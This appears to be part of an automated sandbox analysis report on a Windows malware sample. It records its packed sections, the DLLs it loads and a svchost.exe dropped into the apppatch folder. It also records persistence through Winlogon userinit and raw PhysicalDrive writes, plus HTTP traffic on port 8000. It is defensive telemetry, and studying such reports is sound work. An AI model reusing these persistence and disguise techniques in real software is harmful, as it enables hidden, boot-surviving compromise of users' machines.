Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winhttp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winnsi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: urlmon.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: srvcli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sspicli.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32
Source: uavINoSIQh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernel32.pdb source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wntdll.pdb source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\DLL\wkernel32.pdb source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winsta.pdb source: svchost.exe, 00000002.00000002.2620449428.0000000004493000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626024029.0000000008B4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wkernelbase.pdbcom.lyxynejpS source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\winsta.pdb source: svchost.exe, 00000002.00000002.2617654606.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbRSDS0B source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: svchost.exe, 00000002.00000002.2615235923.0000000002F05000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: svchost.exe, 00000002.00000002.2626024029.0000000008B49000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb( source: svchost.exe, 00000002.00000002.2615235923.0000000002F05000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernelbase.pdb\??\C:\Program Files (x86)\Windows Defender\dll\winsta.pdb source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wkernelbase.pdbe86303.dscx.akamaiedge.net source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernelbase.pdb\* source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\WinSCard.pdbdb source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb( source: svchost.exe, 00000002.00000002.2636696382.000000000D749000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernelbase.pdb source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: kDJwntdll.pdb source: svchost.exe, 00000002.00000002.2604726321.0000000000848000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Program Files (x86)\Windows Defender\wntdll.pdb\* source: svchost.exe, 00000002.00000002.2622345963.0000000006F7B000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\WinSCard.pdb source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\winsta.pdb source: svchost.exe, 00000002.00000002.2624819557.0000000008ACF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626024029.0000000008B54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\DLL\wkernel32.pdb source: svchost.exe, 00000002.00000002.2617654606.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1827672077.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000000.1727427043.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000008.00000002.1827636653.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000000.1743054464.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000000.1771298609.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000000.1782573513.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000000.1785980185.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000000.1812207683.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.1908463497.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000000.1834505436.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000000.1851337162.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000024.00000000.1879363277.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000027.00000002.2033250591.000000000033E000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\WinSCard.pdbb source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wntdll.pdb source: svchost.exe, 00000002.00000002.2624819557.0000000008ACF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\winsta.pdb\*b source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\symbols\dll\winsta.pdb source: svchost.exe, 00000002.00000002.2624819557.0000000008ACF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb( source: svchost.exe, 00000002.00000002.2626024029.0000000008B4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb source: svchost.exe, 00000002.00000002.2636696382.000000000D749000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\winsta.pdb source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\lygyvon.comp source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\WinSCard.pdb* source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winsta.pdb( source: svchost.exe, 00000002.00000002.2620449428.0000000004493000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wrpcrt4.pdb\??\C:\Users\user\AppData\Roaming\8a99a31f\sysinfo.log source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernel32.pdb* source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb( source: svchost.exe, 00000002.00000002.2626024029.0000000008B49000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\uavINoSIQh.exeUnpacked PE file: 0.2.uavINoSIQh.exe.400000.1.unpack .text:ER;.dHGmL:R;.lzmjSu:W;.YOSWO:R;.sTDEgl:R;.fwQO:R;.L:W;.D:W;.data:W;.kubC:W;.hkw:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack .text:ER;.dHGmL:R;.lzmjSu:W;.YOSWO:R;.sTDEgl:R;.fwQO:R;.L:W;.D:W;.data:W;.kubC:W;.hkw:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.2640000.5.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeUnpacked PE file: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1320000.2.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeUnpacked PE file: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1510000.2.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeUnpacked PE file: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2550000.2.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeUnpacked PE file: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.3060000.2.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeUnpacked PE file: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2090000.2.unpack
Source: C:\Users\user\Desktop\uavINoSIQh.exeUnpacked PE file: 0.2.uavINoSIQh.exe.400000.1.unpack
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004020E0
Source: uavINoSIQh.exeStatic PE information: real checksum: 0x6d9c86ef should be: 0x410a0
Source: svchost.exe.0.drStatic PE information: real checksum: 0x2563a9cf should be: 0x410a0
Source: uavINoSIQh.exeStatic PE information: section name: .dHGmL
Source: uavINoSIQh.exeStatic PE information: section name: .lzmjSu
Source: uavINoSIQh.exeStatic PE information: section name: .YOSWO
Source: uavINoSIQh.exeStatic PE information: section name: .sTDEgl
Source: uavINoSIQh.exeStatic PE information: section name: .fwQO
Source: uavINoSIQh.exeStatic PE information: section name: .L
Source: uavINoSIQh.exeStatic PE information: section name: .D
Source: uavINoSIQh.exeStatic PE information: section name: .kubC
Source: uavINoSIQh.exeStatic PE information: section name: .hkw
Source: svchost.exe.0.drStatic PE information: section name: .dHGmL
Source: svchost.exe.0.drStatic PE information: section name: .lzmjSu
Source: svchost.exe.0.drStatic PE information: section name: .YOSWO
Source: svchost.exe.0.drStatic PE information: section name: .sTDEgl
Source: svchost.exe.0.drStatic PE information: section name: .fwQO
Source: svchost.exe.0.drStatic PE information: section name: .L
Source: svchost.exe.0.drStatic PE information: section name: .D
Source: svchost.exe.0.drStatic PE information: section name: .kubC
Source: svchost.exe.0.drStatic PE information: section name: .hkw
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0044B895 push cs; retf 0004h0_2_0044B8F5
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0044E89D push es; iretd 0_2_0044E8AC
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0044B1E0 push eax; ret 0_2_0044B20E
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0044B55E pushad ; ret 0_2_0044B569
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0044B56A push eax; ret 0_2_0044B56D
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0044B576 push ss; ret 0_2_0044B579
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0044EF69 push cs; iretd 0_2_0044EF78
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0044EF33 push cs; ret 0_2_0044EF48
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0225016A push ds; ret 0_2_0225016B
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0225063D push ds; ret 0_2_022505F1
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0225063D push ebx; ret 0_2_02250677
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_02250678 push dword ptr [esp+48h]; ret 0_2_02250747
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_022504C7 push ds; ret 0_2_022504E6
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_022505A1 push ds; ret 0_2_022505F1
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_022505A1 push ebx; ret 0_2_02250677
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B895 push cs; retf 0004h2_2_0044B8F5
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044E89D push es; iretd 2_2_0044E8AC
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B1E0 push eax; ret 2_2_0044B20E
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B55E pushad ; ret 2_2_0044B569
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B56A push eax; ret 2_2_0044B56D
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B576 push ss; ret 2_2_0044B579
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044EF69 push cs; iretd 2_2_0044EF78
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044EF33 push cs; ret 2_2_0044EF48
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02688B69 push cs; iretd 2_2_02688B78
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02688B33 push cs; ret 2_2_02688B48
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0268849D push es; iretd 2_2_026884AC
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02684DE0 push eax; ret 2_2_02684E0E
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_024868D2 push ebp; retf 2_2_024868D3
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0249989D push es; iretd 2_2_024998AC
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02496895 push cs; retf 0004h2_2_024968F5
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_024961E0 push eax; ret 2_2_0249620E

Persistence and Installation Behavior

Source: C:\Windows\apppatch\svchost.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 2_2_026533F0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 5_2_013333F0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 6_2_013F33F0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 8_2_015233F0
Source: C:\Users\user\Desktop\uavINoSIQh.exe File created: C:\Windows\apppatch\svchost.exe
Source: C:\Users\user\Desktop\uavINoSIQh.exe Executable created and started: C:\Windows\apppatch\svchost.exe
Source: C:\Users\user\Desktop\uavINoSIQh.exe Code function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\ 0_2_00403560

Boot Survival

Source: C:\Windows\apppatch\svchost.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 2_2_026533F0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 5_2_013333F0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 6_2_013F33F0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 8_2_015233F0
Source: C:\Windows\apppatch\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinit
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Hooking and other Techniques for Hiding and Protection

Source: c:\users\user\desktop\uavinosiqh.exe File moved: C:\Users\user\AppData\Local\Temp\9648.tmp
Source: unknown Network traffic detected: HTTP traffic on port 56923 -> 8000
Source: unknown Network traffic detected: HTTP traffic on port 8000 -> 56923
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0264D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,2_2_0264D300
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02649ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,2_2_02649ED0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0264CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_0264CFE9
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0264CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,2_2_0264CD50
